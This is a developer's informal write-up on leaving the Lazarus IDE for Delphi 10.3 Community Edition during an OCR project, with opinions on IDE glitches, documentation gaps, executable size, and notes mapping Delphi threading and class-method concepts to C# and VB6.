I felt Lazarus to be clunky and glitchy and overall not very user-friendly. You can't call it a feature-rich IDE. I have no qualms with the Free Pascal Compiler (FPC) it uses though. Lazarus doesn't seem to have a definitive way of doing things. For example, I couldn't use generics. Upon searching the Free Pascal forum, there was so much heat around the topic that I was thoroughly confused. I just gave up on it. The wiki/docs are user-friendly but extremely inadequate. And while Lazarus claims compatibility with Delphi code, I couldn't get the Tesseract library wrapper for Delphi (the tesseract*.pas files) to work no matter how hard I tried. Weird errors popped up when trying to call the Recognize method, and not consistently either. Sometimes it worked, sometimes it didn't. Sometimes the error was 'External error ?' and sometimes it was 'SIGSEGV' or some other garbage nonsense like that. I could not troubleshoot the issue for the life of me. There was no help online. On the topic of errors, I had issues with exception handling in Lazarus as well; I dunno if that's the IDE or the debugger or whatever else may be in there. In hindsight, after having completed the project in Delphi 10.3, I can see that the Lazarus exe was a bit smaller than the one Delphi produced, but other than that, I don't miss anything (the Lazarus-generated executable does seem to launch snappier though).
Okay, all that was why I left Lazarus. Then I learned that Embarcadero had released a completely free Community Edition of Delphi: version 10.3. I downloaded and installed it. Noticeably larger download size and a more time-consuming install. The IDE is slower to open than Lazarus, but as an IDE, Delphi is just better than Lazarus. The autocomplete and IntelliSense feel natural and quick, unlike Lazarus', which takes like an hour to fetch suggestions. Also, there is an option for a dark theme, easier on your eyes. The debugging experience is better. Not quite Visual Studio, but definitely better than Lazarus. Now, the Delphi IDE is better than Lazarus, but it still has its fair share of oddities and glitches. For example, the toolbar layout resets if you hover over one of the menus. The object properties panel has serious sizing issues. Random view and layout resets for no good reason are rampant. Some properties of VCL components are inconsistent and unreliable. For example, the FormStyle property set to fsStayOnTop doesn't work as intended. This is unlike, say, C#, where as far as I can remember the TopMost property works consistently. And in VB6, a simple SetWindowPos with HWND_TOPMOST was all that was needed. But all in all, Delphi development is tolerable and workable.
Whew! That was something. I learnt a lot working on this project. The source can be found on the SRC branch and the binary on the BIN branch of the GitHub repo.

Now, my musings during development:

callbacks/pointers for procedural language, events/delegates for object oriented language
function/procedure for procedural language, methods for object oriented language
global variables for procedural language, interfaces for OOP language

The Delphi 10.3 Community IDE that I'm using right now is glitchy as well, but not as bad as Lazarus.
Documentation/StackOverflow answers on even the simplest Delphi topics are so hard to find online compared to, say, VB6 or C# or Java or Python or C or C++. Every Google search points to delphibasics.co.uk, and that site seems to be down 99% of the time. I remember 'counterstrikewi' from HackHound and OpenSC back in the day, and the site seems to be his?

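TThread.Queue() in Delphi == Dispatcher.BeginInvoke() in C#
TThread.Synchronize() in Delphi == Dispatcher.Invoke() in C#
class method in Delphi == static method of a class in C# (closest with the static directive, since a plain class method still receives the class itself as Self and can be virtual)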

As a language, I think I like Delphi/Object Pascal. Especially for Windows desktop development, with Delphi I can talk to the OS more easily compared to, say, VB6. Calling the Windows API is a breeze. Function/procedure pointers are easy. Multiple compiler directives for low-level stuff. Inline assembly support. A lot of low-level stuff if one wants/needs to use it. All the while, I can also make use of pretty high-level/abstract stuff such as OOP, anonymous methods, for-in, generics and parallel/concurrent programming, among, I'm sure, a lot of others I don't know yet. And the gem of it all, I get RAD, i.e. Rapid Application freakin' Development AKA drag-and-drop visual form design with A LOT of VCL form components; not to mention 64-bit support.

VB6 was fun, and low-level stuff could be done using all sorts of hacks. There was a great online community for that. The IDE was lightning fast and the executables produced were tiny, ~20kB compared to ~2MB from Delphi. The development process was result-oriented, very productive and very quick, I think now because I never knew what OOP was back then and VB6 didn't fully support it either (it had classes and interfaces but no implementation inheritance, if I'm correct). With Delphi, there are some great pluses and some cons. Anyway, it was great learning a new language with this project. And I totally get why one could consider it a great, more productive, more readable alternative to C++.

Some areas where Delphi could improve, in my view, in descending order of significance:

Online community is not that great. Have to search harder for solutions to development-related problems. Embarcadero docs most of the time prove inadequate and could use some code samples. Lazarus forum discussions are pretty basic and most of the time useless; the patronizing, self-aggrandizing members don't help - just shut up about how great Lazarus/FPC is. StackOverflow as always is great, but there aren't a lot of SO topics on Delphi. Almost every Google search points to delphibasics.co.uk, which is dead.

The filesize is humongous. Gotta do something to trim all that unused VCL stuff.

Stay consistent through language revisions. Don't go around implementing breaking changes. It is confusing to newcomers especially given the lack of good online support for the language, cause you know, not a lot of users around.

IDE could use some improvements. Learn from Visual Studio. That is the gold standard IMHO.
